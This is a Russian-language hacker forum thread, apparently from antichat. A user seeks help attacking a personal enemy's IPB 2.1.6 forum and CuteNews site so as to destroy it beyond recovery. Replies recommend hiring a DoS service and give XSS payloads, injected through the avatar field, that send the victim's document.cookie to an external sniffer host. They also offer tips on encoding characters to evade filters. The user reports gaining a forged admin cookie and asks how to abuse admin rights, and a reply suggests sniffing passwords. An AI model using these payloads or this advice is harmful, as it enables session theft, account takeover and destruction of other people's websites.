Превед народ!!! Я здесь новичек, так что сори за может быть глупый вопрос ... Мне надо проучить кое-кого, но у него %:!"; стоит форум IPB 2.1.6 Я здесь перекопал темы но не нашел ничего по этой версии ... может что-то из 2.1.5 сгодиться? У меня ведь модем пока что-то скачаешь умрешь ... а если не знаешь что работает а что нет ... подскажите ... еще там форум русский, а я только инглишь нашел ... а где руссификацию найти? помогите! мне б че нить попроще, типа xss ... и што б затереть фесь форум что б не восстановить было! А еще сразу уж спрошу про CuteNews ... у него она стоит. т.к. в коде можно эту строчку найти. Но прикол в том что он кажись переименовал или переместил дефолтную страницу входа (где лог и пароль вводишь) в панель управления. Я уже все перекопал, в поисковиках существующие страницы сайта смотрел, и через статистику маил.ру, так и не нашел где пароль вводить что б в панель попасть ... При том что новости не только он :*!":*;!"; админ пишет, но и другие юзеры!!! А на сайте автаризации вообще нету ... или скорее я ее не нашел ... народ подскажите! Как быть ... как найти куда пароль писать ... как убить заодно кутеневс эти гакие!
Помойму самое простое решение устроить дос форуму. Поищи людей у которых есть дос-сервис. И пипец форуму.
Ну восстановить форум то можно всегда. Если бэкапы базы регулярные. А так XSS через аватару должна работать. http://forum.antichat.ru/threadnav17358-5-10.html
Ребят Ipb мне при запросе алерт кинул! ато нормально? короче я залез на форум, и зделал запрос javascript:alert('lamo'). если это можно использовать скажите мне что я умный если нет то ниче не говорите P.S. я тока начинаю
Возможно можно стырить куки. Уж это то тут точно есть. Просто всесто алерта надо отсылку на сниффер вписать. Попробуй например: Code: <script> img = new Image(); img.src = "http://адресс_снифера?"+document.cookie; </script>
че за бред !!!!!!! пишу : javascript:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif мне говорит : Не выбрано ни одного аватара. Вернитесь назад и исправьте ошибку. !!!!!!!!!!!!!!!!! версия форума - v2.1.6 пробол в 2.14 тож непашет !!!!!!!!!!!!!!!!!!!
А ничего Соль не даст расшифровать. Кстати... Подмена странички работает через аватару? По идее должна. Не проверял.
Code: <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Вот в коде img.src = "http://" Заменю ссылку на свой снифер и используй куки. Если фильтрует кавычки и т.д,то используй программу URI crypter, чтобы закодировать те символы которые фильтруються!
я ж говорю, через аватар работает. На данный момент у меня есть подделанный куки админа форума, но расшифровать куки без соли нельзя, вопрос в другом, можно ли каким-нибудь образом использовать то, что логинюсь под админом? хоть какие идеи есть? Например, можно ли как-нибудь использовать права админа на добавление в календарь какого-нить события и т.д.
Думаю да. Можно ещё отсниффать пароли к внутренним форумам и полазать по ним. Зависит от настроек форума.
Ну а как тогда быть, если нет возможности загрузить аватар с другого адреса? Если ацкий админ выключил в админке эту возможность?
Ладно пацан я хочу тебе сказать что существует сайт который как-раз подходит к решению и к решению любой проблемы связаной с Уязвимостью . Этот сайт называется securityfocus. Зайди сюда:http://www.securityfocus.com/vulnerabilities найди invision power services потом в нижнем окне напиши invision power board и вследущем окне выбири версию форума. Надеюсь я тебе помог. dracula4ever